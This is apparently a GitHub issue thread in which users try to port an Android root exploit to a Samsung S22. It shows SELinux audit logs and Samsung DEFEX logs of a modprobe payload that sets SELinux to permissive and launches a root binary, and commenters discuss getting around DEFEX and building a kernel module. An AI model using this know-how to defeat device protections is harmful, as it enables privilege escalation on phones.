-29 07:47:12.947 5656 5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42 03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:265): avc: denied { search } for pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered 03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:266): avc: denied { execute } for pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered 03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:267): avc: denied { read open } for pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
oakieville
commented
2 years ago [ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]
elliwigy
commented
2 years ago [ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]
Ahh.. there you go then lol we need to somehow use another dir other than data/local/tmp that isnt a safeplace
elliwigy
commented
2 years ago startup-root is launched here modprobe process is running on root and selinux is already permissive after the line
syscall(__NR_finit_module, ...). So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.I think DEFEX prevents startup-root from launching.
Something like this might work no?
polygraphene
commented
2 years ago I build mymod.ko with s22 kernel. It too large du -sh mymod.ko 432K
That is the output before stripping debug info. Check ./out/(devicename)/dist/mymod.ko file instread.
file in ./out/(devicename)/dist/mymod.ko is 92k ...
Which section takes the capacity? Compare with the one on repository.
Could this same method work on s22, i assume it woukd require mymod.ko be built in s22 kernel source but can it work